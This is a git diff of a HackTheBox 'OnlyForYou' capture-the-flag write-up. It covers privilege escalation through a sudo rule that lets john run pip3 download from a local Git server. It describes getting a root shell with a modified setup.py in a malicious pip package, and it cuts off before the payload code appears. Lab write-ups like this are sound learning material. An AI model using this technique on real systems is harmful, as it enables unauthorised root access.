F41zK4r1m/HackTheBox/OnlyForYou.md

 ## Privilege Escalation:

-After getting access of John's account I checked for the sudo privileges & found this :
+After gaining access to John's account, I checked for sudo privileges and found the following:

 ![image](https://user-images.githubusercontent.com/87700008/234729321-b7ae0af1-b0e6-4658-83e2-c584b00c30ac.png)

-I forwarded the traffic of the port 3000 to my attack machine & loaded it in the browser.
-It's a git server with just 1 test repository.
+I forwarded the traffic of port 3000 to my attack machine and loaded the Git server in the browser.
+It contained only one 'test' repository.

 ![image](https://user-images.githubusercontent.com/87700008/234729484-f99d6703-cb8d-4efa-9003-29f7309e8024.png)

-Now, since I can only run pip3 command & I have access to the Git repository, there may be some some kind of vulnerability exist in the pip download.
-Also, the sudo privilege is giving access to download anything from Git as it's ending with '*'.
+As I only had permission to run the **pip3** command and access to the Git repository, I suspected that there might be a vulnerability in the pip download.
+Moreover, the **sudo** privilege allowed me to download anything from Git as long as the URL ends with '*':
 ```
 User john may run the following commands on only4you:
     (root) NOPASSWD: /usr/bin/pip3 download http\://127.0.0.1\:3000/*.tar.gz
 ```

-I then started checking for the possible command execution methond to gain root shell & ended up landing on this blog : [Malicious Python Packages and Code Execution via pip download](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/)
+I began searching for a possible command execution method to gain root shell access and found this blog post: [Malicious Python Packages and Code Execution via pip download](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/).

-I took setup.py source code which is necesaary to build python pip package & made some changes in it to get root shell, so the final code for setup.py is :
+I used the source code for **setup.py**, which is required to build a Python pip package, and made some changes to obtain root shell access.
+The final code for **setup.py** was as follows:
 ```
 from setuptools import setup, find_packages
 from setuptools.command.install import install